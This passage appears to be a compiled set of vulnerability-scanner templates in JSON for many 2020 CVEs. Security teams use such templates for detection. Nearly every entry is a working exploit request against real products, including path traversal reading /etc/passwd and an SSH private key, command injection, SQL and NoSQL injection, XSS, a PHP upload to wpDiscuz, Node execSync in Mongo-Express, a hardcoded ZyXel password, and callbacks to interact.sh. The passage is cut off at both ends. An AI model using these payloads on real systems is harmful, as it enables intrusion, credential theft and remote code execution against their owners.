Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Finteract.sh%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13638","info":{"name":"rConfig 3.9 - Authentication Bypass(Admin Login)","severity":"critical"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"passconf\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"editid\"\n\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"add\"\n\nadd\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"ulevelid\"\n\n9\n--01b28e152ee044338224bf647275f8eb--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["rConfig - Configuration Management","Logged in as","dashboadFieldSet"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8615","info":{"name":"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains(body_2, \"success\") && contains(body_2, \"true\") && contains(body_2, \"Instructor has been added successfully\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27838","info":{"name":"KeyCloak - Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["\"clientId\":\\s*\"security-admin-console\"","\"secret\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Event Espresso","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: 